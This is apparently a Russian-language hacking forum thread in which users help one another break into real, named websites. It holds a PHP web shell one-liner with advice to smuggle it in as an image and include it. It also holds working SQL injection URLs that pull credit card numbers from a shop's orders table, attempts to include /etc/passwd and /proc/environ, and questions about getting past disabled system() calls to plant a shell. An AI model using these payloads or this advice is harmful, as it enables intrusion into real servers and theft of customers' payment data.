есть альтернатива,попробуй залится через webalizer, если он там есть канешн. или залей картинку с кодом шелла <?system($_GET[cmd]);?> а потом заинклудь ее...
Объясните плиз почему нет вывода из столба cc_number Code: http://www.sweetsunnah.fr/customer_testimonials.php?testimonial_id=99999+and+1=0+Union+Select+1,2,cc_number,4,5,6,7,8+FROM+sweetsunnah.orders+LIMIT+1,1+--+ остальные нормально выводит, например Code: http://www.sweetsunnah.fr/customer_testimonials.php?testimonial_id=99999+and+1=0+Union+Select+1,2,billing_country,4,5,6,7,8+FROM+sweetsunnah.orders+LIMIT+1,1+--+ п.с. пробелы вставил форум (and +1, FR OM, swe etsunnah)
потому что пустые там значения Code: http://www.sweetsunnah.fr/customer_testimonials.php?testimonial_id=99999+and%20+1=0+Union+Select+1,2,group_concat%28cc_number%29,4,5,6,7,8+FROM+sweetsunnah.orders+--+
Народ вопрос !В php injection плохо шарю но и время нету разбираться допустим есть сайт http://site.com/?source=about?file=../../../../etc/passwd получаеться вот так: Warning: include(pages/about?file=../../../../etc/passwd.php) [function.include]: failed to open stream: No such file or directory in /var/www/core/data/www/site.com/skin/skin.php on line 69 Warning: include() [function.include]: Failed opening 'pages/about?file=../../../../etc/passwd.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/core/data/www/site.com/skin/skin.php on line 69 из этого можно вообще что нить сделать?Зараннее спасибо
наткнулся на уязвимую (как мне показалось) страничку http://www.punkradiocast.com/NEW10.php?start=3 подставляя кавычку, движок вываливает предупреждение и сам запрос к базе... делаем его корректным http://www.punkradiocast.com/NEW10.php?start=3,3--+ после этого пытался сделать union select - не сработало... даже добавив к запросу and 1=1 имеем ошибку mysql, хотя логика запроса лично мне кажется верной встречался с таким не один раз, в чем я ошибаюсь? и как построить sql inj в таком случае?
инъекия в лимите Code: ...active = 1 ORDER BY date_created DESC, sort_name, title [B]LIMIT 1 and 1=1[/B], 3 Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/punkradi/public_html/NEW10.php on line 48
Seravin, наверно я плохо объяснил... я имел ввиду запрос такого вида http://www.punkradiocast.com/NEW10.php?start=3,3+and+1=1--+
на античате была статья про инъекцию в LIMITе, но нужно, чтобы перед лимитом не было order by, а в приведенном выше примере он есть.
Как провести инклуд если в скрипте только такой код PHP: $page = $_GET['page']; А Include нету О_о (((((
Не умничай Перепробовал все что возможно, CONVERT(Version(),binary) и т.д. всеравно ошибка, когда в запросе присутствуют скобки... Вот короче эта скуля - http://www.bikeland.ru/rus/catalog/?action=assortment&id=-95+union+select+1+--+
а причем тут кодировка я не понял? скобки и кодировка?никто не умничает...просто ты думай перед тем как бред и чушь всякую постить для тех кто в танке ''Вопрос №2 Вот так выводит , а вот так невыводит. site.com/index.php?id=1+union+select+1,2,3,4/*------------выводит site.com/index.php?id=1+union+select+1,version(),3,4/*----невыводит Господа, вывод у скули либо есть, либо нет, и если вы видите вывод цифры, но не видите версию или значние из столбца, то варианта 2 либо кодировка, либо тип данных не соответствует Кодировка: Может сопровождаться ошибкой такого плана: Код: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) Бороться с этим можно несколькими способами, но все они сводятся к одному и тому-же. Что-бы получить данные в нужной нам кодировке можно пользоваться либо функциями приведения типов: cast(Version()+as+binary) CONVERT(Version(),binary) convert(version()+using+latin1) convert(version()+using+binary) Либо шифровать/дешифровать данные. Результат при этом возвращается уже в "правильной" кодировке aes_decrypt(aes_encrypt(Version(),1),1) unhex(hex(version())) пример, можете поэксперементировать с разными функциями: http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,cast(version()+as+binary),3,4,5,6 ,7,8,9,10,11,12,13,14+from+information_schema.tabl es-- Несоответствие типа данных вам может встретится на БД отличных от MySql. MySql относится к типам данных достаточно лояльно, а вот другие БД в основном несоответствия не терпят. Если ваша база оказалась именно такой нужно ознакомится со статьями по проведению инъекций в Вашей базе. '' by Jokester теперь еще раз повторюсь..причем вообще скобки с кодировкой? можеш; попробовать в жопе пальцем ковырнутся что бы золото добыть, если ничего не получится это не значит что из за того что палец кривой...чуешь?
Есть сайт, крутится на apache2 tomcat Есть уязвимость, заключается в скачивании любых файлов сервака, типа: Стоит на серваке Jboss, но какая база не ясно, файл etc/mysql/my.cnf прочитал, вот его содержимое: Code: [mysqld_safe] socket = /var/run/mysqld/mysqld.sock nice = 0 [mysqld] # # * Basic Settings # user = mysql pid-file = /var/run/mysqld/mysqld.pid socket = /var/run/mysqld/mysqld.sock port = 3306 basedir = /usr datadir = /var/lib/mysql tmpdir = /tmp language = /usr/share/mysql/english skip-external-locking !includedir /etc/mysql/conf.d/ логи не ведутся. Вопрос, куда можно покопать и узнать какой может быть движок базы и как можно узнать есть ли что-то в mysql?
немогу проинклудить useragent system() и passthru() has been disabled for security reasons in /proc/19925/environ Как можно обойти это и залить шелл
Да я все функции перебрал eval(), copy(), system(), passthru(), exec(), может есть скрипт который обходит это дело?
Что, не работают эти функции? Тогда сложновато будет с заливкой шелльца, а даже если зальешь, то все равно трудно будет в управлении - права то обрезаны по самое не балуйся.
